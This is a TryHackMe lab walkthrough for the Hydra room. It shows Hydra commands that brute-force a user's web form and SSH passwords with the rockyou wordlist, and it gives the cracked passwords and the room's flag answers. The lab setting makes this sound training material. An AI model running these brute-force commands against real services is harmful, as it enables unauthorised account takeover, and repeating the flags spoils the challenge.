Hydra (TryHackMe Walkthrough)

What is Hydra?

Hydra has the ability to brute-force the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Hydra Commands

hydra -l user_name -P password_list.txt ftp://IP of the machine

For the purpose of this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).

SSH

Post Web Form

hydra -l <username> -P <wordlist> Machine’s IP http-post-form “/:username=^USER^&password=^PASS^:F=incorrect” -V

Use Hydra to brute force molly’s web password. What is flag 1?

hydra -l molly -P /usr/share/wordlists/rockyou.txt Machine’s IP http-post-form “/login:username=^USER^&password=^PASS^:incorrect”

It tries all the passwords from rockyou.txt and shows the correct password which in our case is

[80][http-post-form] host: Machine’s IP login: molly password: sunshine

so use this password to log into the webpage that is in the Machine’s IP.

username: molly

Password: sunshine

brute-forcing the password
after logging in with the found password

there is the flag : THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to bruteforce molly’s SSH password. What is flag 2?

hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://Machine’s IP

Now here you will again get a valid password in highlighted text

username : molly

Password : butterfly

Now, think for a while and you will get to a point that the flag must be in the machine so you must login via SSH. so login to the machine using SSH:

ssh molly@Machine’s IP

now type “Yes” if it asks you whether you want to continue.

Enter the password, i.e: butterfly

Bruteforcing SSH

Now when you get logged in, try

ls

so there is a file flag2.txt

finding the flag
reading the flag

Now cat the file, i.e : cat flag2.txt

Ans : THM{c8eeb0468febbadea859baeb33b2541b}

I’m an electronics and Communication Engineer/ Cybersecurity Enthusiast/ Musician / Photographer / Video Editor